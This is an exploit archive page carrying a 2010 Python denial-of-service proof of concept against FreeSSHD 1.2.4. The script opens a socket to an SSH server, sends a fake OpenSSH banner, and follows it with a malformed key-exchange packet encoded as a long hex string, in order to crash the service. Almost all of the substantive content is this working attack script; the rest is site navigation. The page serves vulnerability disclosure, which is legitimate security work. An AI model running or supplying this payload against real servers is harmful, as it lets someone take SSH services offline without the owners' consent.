FreeSSHD 1.2.4 Buffer Overflow Denial Of Service

FreeSSHD 1.2.4 Buffer Overflow Denial Of Service: Posted Mar 22, 2010; Authored by Pi3rrot; FreeSSHD version 1.2.4 buffer overflow denial of service exploit.; tags | exploit, denial of service, overflow; SHA-256 | c0080beea5f8d16cc9dc4b26d6fc74b78d10f0904076c038928a28c3c050dc7f; Download | Favorite | View

FreeSSHD 1.2.4 Buffer Overflow Denial Of Service



#!/usr/bin/env python

"""
# Exploit Title: FreeSSHD 1.2.4 Remote Buffer Overflow DoS
# Date: 22-03-2010
# Author: Pi3rrot  -  tagazok [At] gmail [D0t] com         ak37@freenode
# Software Link: http://www.freesshd.com/
# Version: 1.2.4
# Tested on: Windows XP SP3 fr

# Explications :     This pof just may crash FreeSSHD 1.2.4 on ssh2 connexion.
            It use a malformed string on the SSH Key Exchange Init Corruption
            Exploit tested on Windows SP3 fr

            maybe it can be more exploited ?

Greets to the metasploit project & PV Eeckhoutte tutorials
"""

import sys
import socket

host = "192.168.0.14"
port = 22

print "********************************************************"
print "          FreeSSHD 1.2.4 Buffer Overflow DoS"
print "                     by Pi3rrot"
print "                  tagazok@gmail.com<mailto:tagazok@gmail.com>"
print "********************************************************"

banner = "SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n"

key = "\x00\x00\x03\x14\x082\xff\xff\x9f\xde\x5d\x5f\xb3\x07\x8f\x49\xa7\x79\x6a\x03\x3d\xaf\x55\x00\x00\x00\x7e\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x2d\x65\x78\x63\x68\x61\x6e\x67\x65\x2d\x73\x68\x61\x32\x35\x36\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x2d\x65\x78\x63\x68\x61\x6e\x67\x65\x2d\x73\x68\x61\x31\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x31\x34\x2d\x73\x68\x61\x31\x2c\x64\x69\x66\x66\x69\x65\x2d\x68\x65\x6c\x6c\x6d\x61\x6e\x2d\x67\x72\x6f\x75\x70\x31\x2d\x73\x68\x61\x31\x00\x00\x00\x0fssh-rsa,ssh-dss\x00\x00\x00\x9d\x61\x65\x73\x31\x32\x38\x2d\x63\x62\x63\x2c\x33\x64\x65\x73\x2d\x63\x62\x63\x2c\x62\x6c\x6f\x77\x66\x69\x73\x68\x2d\x63\x62\x63\x2c\x63\x61\x73\x74\x31\x32\x38\x2d\x63\x62\x63\x2c\x61\x72\x63\x66\x6f\x75\x72\x31\x32\x38\x2c\x61\x72\x63\x66\x6f\x75\x72\x32\x35\x36\x2c\x61\x72\x63\x66\x6f\x75\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x62\x63\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x62\x63\x2c\x72\x69\x6a\x6e\x64\x61\x65\x6c\x2d\x63\x62\x63\x40\x6c\x79\x73\x61\x74\x6f\x72\x2e\x6c\x69\x75\x2e\x73\x65\x2c\x61\x65\x73\x31\x32\x38\x2d\x63\x74\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x74\x72\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x74\x72\x00\x00\x00\x9d\x61\x65\x73\x31\x32\x38\x2d\x63\x62\x63\x2c\x33\x64\x65\x73\x2d\x63\x62\x63\x2c\x62\x6c\x6f\x77\x66\x69\x73\x68\x2d\x63\x62\x63\x2c\x63\x61\x73\x74\x31\x32\x38\x2d\x63\x62\x63\x2c\x61\x72\x63\x66\x6f\x75\x72\x31\x32\x38\x2c\x61\x72\x63\x66\x6f\x75\x72\x32\x35\x36\x2c\x61\x72\x63\x66\x6f\x75\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x62\x63\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x62\x63\x2c\x72\x69\x6a\x6e\x64\x61\x65\x6c\x2d\x63\x62\x63\x40\x6c\x79\x73\x61\x74\x6f\x72\x2e\x6c\x69\x75\x2e\x73\x65\x2c\x61\x65\x73\x31\x32\x38\x2d\x63\x74\x72\x2c\x61\x65\x73\x31\x39\x32\x2d\x63\x74\x72\x2c\x61\x65\x73\x32\x35\x36\x2d\x63\x74\x72\x00\x00\x00\x69\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2c\x75\x6d\x61!
 \x63\x2d\x36\x34\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2d\x39\x36\x2c\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2d\x39\x36\x00\x00\x00\x69\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2c\x75\x6d\x61\x63\x2d\x36\x34\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x2c\x68\x6d\x61\x63\x2d\x72\x69\x70\x65\x6d\x64\x31\x36\x30\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x68\x6d\x61\x63\x2d\x73\x68\x61\x31\x2d\x39\x36\x2c\x68\x6d\x61\x63\x2d\x6d\x64\x35\x2d\x39\x36\x00\x00\x00\x1a\x7a\x6c\x69\x62\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x7a\x6c\x69\x62\x2c\x6e\x6f\x6e\x65\x00\x00\x00\x1a\x7a\x6c\x69\x62\x40\x6f\x70\x65\x6e\x73\x73\x68\x2e\x63\x6f\x6d\x2c\x7a\x6c\x69\x62\x2c\x6e\x6f\x6e\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"



buffer = banner + key

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((host, port))

print '[+] reponse du serveur : ' + sock.recv(1000)

sock.send(buffer)
print '[+] Buffer sent'



sock.close()

Top Authors In Last 30 Days

Red Hat 288 files
Ubuntu 99 files
Gentoo 29 files
indoushka 26 files
Debian 16 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
jheysel-r7 2 files
Pierre Kim 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,527)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,402)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,689)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

FreeSSHD 1.2.4 Buffer Overflow Denial Of Service

FreeSSHD 1.2.4 Buffer Overflow Denial Of Service

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

FreeSSHD 1.2.4 Buffer Overflow Denial Of Service

Share This

FreeSSHD 1.2.4 Buffer Overflow Denial Of Service

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems